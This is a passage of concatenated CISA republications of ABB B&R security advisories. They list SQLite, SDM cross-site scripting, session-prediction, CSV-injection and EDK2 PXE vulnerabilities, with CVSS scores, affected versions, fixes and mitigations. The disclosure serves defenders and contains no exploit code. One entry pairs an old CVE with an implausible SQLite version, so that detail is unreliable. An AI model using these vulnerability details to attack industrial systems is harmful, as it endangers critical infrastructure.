Integer Overflow or Wraparound Metrics CVSS Version Base Score Base Severity Vector String 3.0 8.1 HIGH CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2018-20505 SQLite 3.25.2, when queries are run on a table with a malformed PRIMARY KEY, allows remote attackers to cause a denial of service (application crash) by leveraging the ability to run arbitrary SQL statements (such as in certain WebSQL use cases). View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.0 7.5 HIGH CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2018-20346 SQLite before 3.25.3, when the FTS3 extension is enabled, encounters an integer overflow (and resultant buffer overflow) for FTS3 queries that occur after crafted changes to FTS3 shadow tables, allowing remote attackers to execute arbitrary code by leveraging the ability to run arbitrary SQL statements (such as in certain WebSQL use cases), aka Magellan. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-190 Integer Overflow or Wraparound Metrics CVSS Version Base Score Base Severity Vector String 3.0 8.1 HIGH CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2018-8740 In SQLite through 3.22.0, databases whose schema is corrupted using a CREATE TABLE AS statement could cause a NULL pointer dereference, related to build.c and prepare.c. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.0 7.5 HIGH CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2017-10989 The getNodeSize function in ext/rtree/rtree.c in SQLite through 3.19.3, as used in GDAL and other products, mis-handles undersized RTree blobs in a crafted database, leading to a heap-based buffer over-read or possibly un-specified other impact. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.0 9.8 CRITICAL CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2016-6153 There exists a vulnerability in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available. This could lead to a memory corruption issue. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.0 5.9 MEDIUM CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C CVE-2015-6607 SQLite before 3.8.9, as used in Android before 5.1.1 LMY48T, allows attackers to gain privileges via a crafted application, aka internal bug 20099586. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-286 Incorrect User Management Metrics CVSS Version Base Score Base Severity Vector String 3.0 3.7 LOW CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C CVE-2015-5895 Multiple unspecified vulnerabilities in SQLite before 3.8.10.2, as used in Apple iOS before 9, have unknown im-pact and attack vectors. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-200 Exposure of Sensitive Information to an Unauthorized Actor Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C CVE-2015-3717 Multiple buffer overflows in the printf functionality in SQLite, as used in Apple iOS before 8.4 and OS X before 10.10.4, allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via un-specified vectors. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') Metrics CVSS Version Base Score Base Severity Vector String 3.0 7.5 HIGH CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2015-3416 The sqlite3VXPrintf function in printf.c in SQLite before 3.8.9 does not properly handle precision and width values during floating-point conversions, which allows context-dependent attackers to cause a denial of service (integer overflow and stack-based buffer overflow) or possibly have unspecified other impact via large integers in a crafted printf function call in a SELECT statement. View CVE Details Affected Products ABB B&R Automation Studio Vendor: ABB Product Version: ABB B&R Automation Studio <6.5 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product versions: B&R Automation Studio 6.5 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Refer to section “General security recommendations” for advice on how to keep your system secure. Relevant CWE: CWE-190 Integer Overflow or Wraparound Metrics CVSS Version Base Score Base Severity Vector String 3.0 7.8 HIGH CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C Acknowledgments ABB PSIRT reported these vulnerabilities to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by B&R. B&R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&R or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&R or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from B&R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT SA25P007 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-02-18 Date Revision Summary 2026-02-18 1 Initial version. 2026-05-21 2 Initial CISA Republication of ABB PSIRT SA25P007 advisory Legal Notice and Terms of Use

View CSAF Summary An update is available that resolves a vulnerability identified by B&Rs internal security analysis in the product versions listed as affected in this advisory. An attacker who successfully exploited these vulnerabilities could take over a remote session or execute code in the context of the user’s browser session. The following versions of ABB B&R Automation Runtime are affected: Automation Runtime <6.4, 6.4 (CVE-2025-3449, CVE-2025-3448, CVE-2025-11498) CVSS Vendor Equipment Vulnerabilities v3 6.1 B&R ABB B&R Automation Runtime Generation of Predictable Numbers or Identifiers, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Improper Neutralization of Formula Elements in a CSV File Background Critical Infrastructure Sectors: Energy Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-3449 A Generation of Predictable Numbers or Identifiers vulnerability in the SDM component of B&R Automation Runtime versions before 6.4 may allow an unauthenticated network-based attacker to take over already established sessions. View CVE Details Affected Products ABB B&R Automation Runtime Vendor: B&R Product Version: Automation Runtime <6.4 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in Automation Runtime 6.4. The System Diagnostic Manager (SDM) is disabled by default in Automation Runtime 6 and is not intended be enabled on active systems located outside properly secured production networks or in facilities lacking adequate physical and logical access controls to prevent any form of unauthorized interaction. For customers who use SDM on their systems, B&R recommends applying the update based on risk assessment at the earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Relevant CWE: CWE-340 Generation of Predictable Numbers or Identifiers Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.2 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O/RC:C CVE-2025-3448 Reflected cross-site scripting (XSS) vulnerabilities exist in System Diagnostics Manager (SDM) of B&R Automation Runtime versions before 6.4 that enables a remote attacker to execute arbitrary JavaScript code in the context of the attacked user’s browser session View CVE Details Affected Products ABB B&R Automation Runtime Vendor: B&R Product Version: Automation Runtime <6.4 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in Automation Runtime 6.4. The System Diagnostic Manager (SDM) is disabled by default in Automation Runtime 6 and is not intended be enabled on active systems located outside properly secured production networks or in facilities lacking adequate physical and logical access controls to prevent any form of unauthorized interaction. For customers who use SDM on their systems, B&R recommends applying the update based on risk assessment at the earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:F/RC:C CVE-2025-11498 An Improper Neutralization of Formula Elements in a CSV File vulnerability exists in System Diagnostics Manager (SDM) of B&R Automation Runtime versions before 6.4 enabling a remote attacker to inject formula data into a generated CSV file. The exploitation of this vulnerability requires the attack-er to create a malicious link. The user would need to click on this link, after which the resulting CSV file additionally needs to be manually opened. View CVE Details Affected Products ABB B&R Automation Runtime Vendor: B&R Product Version: Automation Runtime <6.4 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in Automation Runtime 6.4. The System Diagnostic Manager (SDM) is disabled by default in Automation Runtime 6 and is not intended be enabled on active systems located outside properly secured production networks or in facilities lacking adequate physical and logical access controls to prevent any form of unauthorized interaction. For customers who use SDM on their systems, B&R recommends applying the update based on risk assessment at the earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Relevant CWE: CWE-1236 Improper Neutralization of Formula Elements in a CSV File Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/RL:O/RC:C Acknowledgments ABB PSIRT reported these vulnerabilities to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by B&R. B&R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&R or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&R or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from B&R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Mitigating factors Do not enable the System Diagnostics Manager when it is not required. Refer to section “General security recommendations” for further advise on how to keep your system secure. Workarounds Do not use Hyperlinks provided by untrusted 3rd party to access the SDM. Hyperlinks may be provided via: • Emails from unknown users • Social media channels • Messaging services • Webpages with comment functionality • QR Codes The use of external Web Application Firewalls (WAF) can mitigate attacks using reflected cross-site scripting. Frequently asked questions What causes the vulnerabilities? The vulnerabilities are caused by insufficient input sanitization and generation of predictable numbers. What is System Diagnostics Manager (SDM)? System Diagnostics Manager (SDM) is a webpage available over the Automation Runtime Webserver, showing key diagnostic information of the running controller. What is Automation Runtime (AR)? B&R Automation Runtime is a middleware system enabling customers to run applications on B&R target systems. What might an attacker use the vulnerabilities to do? An attacker who successfully exploited these vulnerabilities could cause to run arbitrary code in the context of the user’s browser session or take over the user’s session. Since the SDM currently does not process any session-specific data and also does not implement authentication mechanisms at the session level, B&R is not aware of any advantages an attacker could gain by taking over the session ID How could an attacker exploit the vulnerabilities? To exploit the XSS vulnerability CVE-2025-3448, an attacker could try to create a hyperlink including malicious script code. This hyperlink must be opened by the user to launch the attack. To exploit vulnerability CVE-2025-3449, an attacker would need to guess a user's session ID. Could the vulnerabilities be exploited remotely? Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed. When this security advisory was issued, had this vulnerability been publicly disclosed? No, B&R discovered the vulnerabilities through its own security analysis. When this security advisory was issued, had B&R received any reports that this vulnerability was being exploited? No, B&R had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT SA25P003 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2025-10-07 Date Revision Summary 2025-10-07 1 Initial version. 2025-10-14 2 Added information about CVE-2025-11498 2026-05-21 3 Initial CISA Republication of ABB PSIRT SA25P003 advisory Legal Notice and Terms of Use

View CSAF Summary ABB became aware of vulnerability in the product versions listed as affected in the advisory. An update is now available that addresses and remediates the vulnerability. A network attacker could exploit the vulnerabilities to execute remote code, initiate DoS attacks, conduct DNS cache poisoning, or extract sensitive information. The following versions of ABB B&R PCs are affected: APC4100 <1.09, 1.09 (CVE-2023-45229, CVE-2023-45230, CVE-2023-45231, CVE-2023-45232, CVE-2023-45233, CVE-2023-45234, CVE-2023-45235, CVE-2023-45236, CVE-2023-45237) APC910 <=1.25 (CVE-2023-45229, CVE-2023-45230, CVE-2023-45231, CVE-2023-45232, CVE-2023-45233, CVE-2023-45234, CVE-2023-45235, CVE-2023-45236, CVE-2023-45237) C80 <1.14, 1.14 (CVE-2023-45229, CVE-2023-45230, CVE-2023-45231, CVE-2023-45232, CVE-2023-45233, CVE-2023-45234, CVE-2023-45235, CVE-2023-45236, CVE-2023-45237) MPC3100 <1.24, 1.24 (CVE-2023-45229, CVE-2023-45230, CVE-2023-45231, CVE-2023-45232, CVE-2023-45233, CVE-2023-45234, CVE-2023-45235, CVE-2023-45236, CVE-2023-45237) PPC1200 <1.14, 1.14 (CVE-2023-45229, CVE-2023-45230, CVE-2023-45231, CVE-2023-45232, CVE-2023-45233, CVE-2023-45234, CVE-2023-45235, CVE-2023-45236, CVE-2023-45237) PPC900 <2.16, 2.16 (CVE-2023-45229, CVE-2023-45230, CVE-2023-45231, CVE-2023-45232, CVE-2023-45233, CVE-2023-45234, CVE-2023-45235, CVE-2023-45236, CVE-2023-45237) APC2200 <1.35, 1.35 (CVE-2023-45229, CVE-2023-45230, CVE-2023-45231, CVE-2023-45232, CVE-2023-45233, CVE-2023-45234, CVE-2023-45235, CVE-2023-45236, CVE-2023-45237) PPC2200 <1.35, 1.35 (CVE-2023-45229, CVE-2023-45230, CVE-2023-45231, CVE-2023-45232, CVE-2023-45233, CVE-2023-45234, CVE-2023-45235, CVE-2023-45236, CVE-2023-45237) APC3100 <1.45, 1.45 (CVE-2023-45229, CVE-2023-45230, CVE-2023-45231, CVE-2023-45232, CVE-2023-45233, CVE-2023-45234, CVE-2023-45235, CVE-2023-45236, CVE-2023-45237) PPC3100 <1.45, 1.45 (CVE-2023-45229, CVE-2023-45230, CVE-2023-45231, CVE-2023-45232, CVE-2023-45233, CVE-2023-45234, CVE-2023-45235, CVE-2023-45236, CVE-2023-45237) CVSS Vendor Equipment Vulnerabilities v3 8.3 ABB ABB B&R PCs Out-of-bounds Read, Improper Restriction of Operations within the Bounds of a Memory Buffer, Loop with Unreachable Exit Condition ('Infinite Loop'), Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) Background Critical Infrastructure Sectors: Energy Countries/Areas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2023-45229 EDK2's Network Package is susceptible to an out-of-bounds read vulnerability when processing the IA_NA or IA_TA option in a DHCPv6 Advertise message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality. View CVE Details Affected Products ABB B&R PCs Vendor: ABB Product Version: ABB APC4100 <1.09, ABB APC910 <=1.25, ABB C80 <1.14, ABB MPC3100 <1.24, ABB PPC1200 <1.14, ABB PPC900 <2.16, ABB APC2200 <1.35, ABB PPC2200 <1.35, ABB APC3100 <1.45, ABB PPC3100 <1.45 Product Status: fixed, known_affected Remediations Vendor fix The problems are corrected in the following product versions: - APC4100 1.09 - APC910 No patch will be released (Please refer to the mitigation measures specified in this advisory). - C80 1.14 - MPC3100 1.24 - PPC1200 1.14 - PPC900 2.16 - APC2200 1.35 - PPC2200 1.35 - APC3100 1.45 - PPC3100 1.45 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Deactivate the vulnerable component - The vulnerabilities exist in the Preboot eXecution Environment (PXE) of the UEFI firmware. If this functionality is not needed, it is recommended to disable it in the UEFI settings, thus making the vulnerabilities not exploitable. Limit accessibility - If PXE functionality is required, users should tightly restrict network traffic to legitimate users and block illegitimate PXE traffic, specifically related to IPv6. For instance, by blocking IPv6 network traffic on the control network firewall. https://help.br-automation.com/#/en/6/cyber-security/defense-in-depth-for-br-products/reference_architecture.html Refer to section “General security recommendations” for further advise on how to keep your system secure. Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C CVE-2023-45230 EDK2's Network Package is susceptible to a buffer overflow vulnerability via a long server ID option in DHCPv6 client. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability. View CVE Details Affected Products ABB B&R PCs Vendor: ABB Product Version: ABB APC4100 <1.09, ABB APC910 <=1.25, ABB C80 <1.14, ABB MPC3100 <1.24, ABB PPC1200 <1.14, ABB PPC900 <2.16, ABB APC2200 <1.35, ABB PPC2200 <1.35, ABB APC3100 <1.45, ABB PPC3100 <1.45 Product Status: fixed, known_affected Remediations Vendor fix The problems are corrected in the following product versions: - APC4100 1.09 - APC910 No patch will be released (Please refer to the mitigation measures specified in this advisory). - C80 1.14 - MPC3100 1.24 - PPC1200 1.14 - PPC900 2.16 - APC2200 1.35 - PPC2200 1.35 - APC3100 1.45 - PPC3100 1.45 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Deactivate the vulnerable component - The vulnerabilities exist in the Preboot eXecution Environment (PXE) of the UEFI firmware. If this functionality is not needed, it is recommended to disable it in the UEFI settings, thus making the vulnerabilities not exploitable. Limit accessibility - If PXE functionality is required, users should tightly restrict network traffic to legitimate users and block illegitimate PXE traffic, specifically related to IPv6. For instance, by blocking IPv6 network traffic on the control network firewall. https://help.br-automation.com/#/en/6/cyber-security/defense-in-depth-for-br-products/reference_architecture.html Refer to section “General security recommendations” for further advise on how to keep your system secure. Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.3 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H/E:P/RL:O/RC:C CVE-2023-45231 EDK2's Network Package is susceptible to an out-of-bounds read vulnerability when processing Neighbor Discovery Redirect message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality. View CVE Details Affected Products ABB B&R PCs Vendor: ABB Product Version: ABB APC4100 <1.09, ABB APC910 <=1.25, ABB C80 <1.14, ABB MPC3100 <1.24, ABB PPC1200 <1.14, ABB PPC900 <2.16, ABB APC2200 <1.35, ABB PPC2200 <1.35, ABB APC3100 <1.45, ABB PPC3100 <1.45 Product Status: fixed, known_affected Remediations Vendor fix The problems are corrected in the following product versions: - APC4100 1.09 - APC910 No patch will be released (Please refer to the mitigation measures specified in this advisory). - C80 1.14 - MPC3100 1.24 - PPC1200 1.14 - PPC900 2.16 - APC2200 1.35 - PPC2200 1.35 - APC3100 1.45 - PPC3100 1.45 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Deactivate the vulnerable component - The vulnerabilities exist in the Preboot eXecution Environment (PXE) of the UEFI firmware. If this functionality is not needed, it is recommended to disable it in the UEFI settings, thus making the vulnerabilities not exploitable. Limit accessibility - If PXE functionality is required, users should tightly restrict network traffic to legitimate users and block illegitimate PXE traffic, specifically related to IPv6. For instance, by blocking IPv6 network traffic on the control network firewall. https://help.br-automation.com/#/en/6/cyber-security/defense-in-depth-for-br-products/reference_architecture.html Refer to section “General security recommendations” for further advise on how to keep your system secure. Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C CVE-2023-45232 EDK2's Network Package is susceptible to an infinite loop vulnerability when parsing unknown options in the Destination Options header of IPv6. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Availability. View CVE Details Affected Products ABB B&R PCs Vendor: ABB Product Version: ABB APC4100 <1.09, ABB APC910 <=1.25, ABB C80 <1.14, ABB MPC3100 <1.24, ABB PPC1200 <1.14, ABB PPC900 <2.16, ABB APC2200 <1.35, ABB PPC2200 <1.35, ABB APC3100 <1.45, ABB PPC3100 <1.45 Product Status: fixed, known_affected Remediations Vendor fix The problems are corrected in the following product versions: - APC4100 1.09 - APC910 No patch will be released (Please refer to the mitigation measures specified in this advisory). - C80 1.14 - MPC3100 1.24 - PPC1200 1.14 - PPC900 2.16 - APC2200 1.35 - PPC2200 1.35 - APC3100 1.45 - PPC3100 1.45 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Deactivate the vulnerable component - The vulnerabilities exist in the Preboot eXecution Environment (PXE) of the UEFI firmware. If this functionality is not needed, it is recommended to disable it in the UEFI settings, thus making the vulnerabilities not exploitable. Limit accessibility - If PXE functionality is required, users should tightly restrict network traffic to legitimate users and block illegitimate PXE traffic, specifically related to IPv6. For instance, by blocking IPv6 network traffic on the control network firewall. https://help.br-automation.com/#/en/6/cyber-security/defense-in-depth-for-br-products/reference_architecture.html Refer to section “General security recommendations” for further advise on how to keep your system secure. Relevant CWE: CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2023-45233 EDK2's Network Package is susceptible to an infinite loop vulnerability when parsing a PadN option in the Destination Options header of IPv6. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Availability. View CVE Details Affected Products ABB B&R PCs Vendor: ABB Product Version: ABB APC4100 <1.09, ABB APC910 <=1.25, ABB C80 <1.14, ABB MPC3100 <1.24, ABB PPC1200 <1.14, ABB PPC900 <2.16, ABB APC2200 <1.35, ABB PPC2200 <1.35, ABB APC3100 <1.45, ABB PPC3100 <1.45 Product Status: fixed, known_affected Remediations Vendor fix The problems are corrected in the following product versions: - APC4100 1.09 - APC910 No patch will be released (Please refer to the mitigation measures specified in this advisory). - C80 1.14 - MPC3100 1.24 - PPC1200 1.14 - PPC900 2.16 - APC2200 1.35 - PPC2200 1.35 - APC3100 1.45 - PPC3100 1.45 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Deactivate the vulnerable component - The vulnerabilities exist in the Preboot eXecution Environment (PXE) of the UEFI firmware. If this functionality is not needed, it is recommended to disable it in the UEFI settings, thus making the vulnerabilities not exploitable. Limit accessibility - If PXE functionality is required, users should tightly restrict network traffic to legitimate users and block illegitimate PXE traffic, specifically related to IPv6. For instance, by blocking IPv6 network traffic on the control network firewall. https://help.br-automation.com/#/en/6/cyber-security/defense-in-depth-for-br-products/reference_architecture.html Refer to section “General security recommendations” for further advise on how to keep your system secure. Relevant CWE: CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C CVE-2023-45234 EDK2's Network Package is susceptible to a buffer overflow vulnerability when processing DNS Servers option from a DHCPv6 Advertise message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability. View CVE Details Affected Products ABB B&R PCs Vendor: ABB Product Version: ABB APC4100 <1.09, ABB APC910 <=1.25, ABB C80 <1.14, ABB MPC3100 <1.24, ABB PPC1200 <1.14, ABB PPC900 <2.16, ABB APC2200 <1.35, ABB PPC2200 <1.35, ABB APC3100 <1.45, ABB PPC3100 <1.45 Product Status: fixed, known_affected Remediations Vendor fix The problems are corrected in the following product versions: - APC4100 1.09 - APC910 No patch will be released (Please refer to the mitigation measures specified in this advisory). - C80 1.14 - MPC3100 1.24 - PPC1200 1.14 - PPC900 2.16 - APC2200 1.35 - PPC2200 1.35 - APC3100 1.45 - PPC3100 1.45 B&R recommends that customers apply the update at earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Mitigation Deactivate the vulnerable 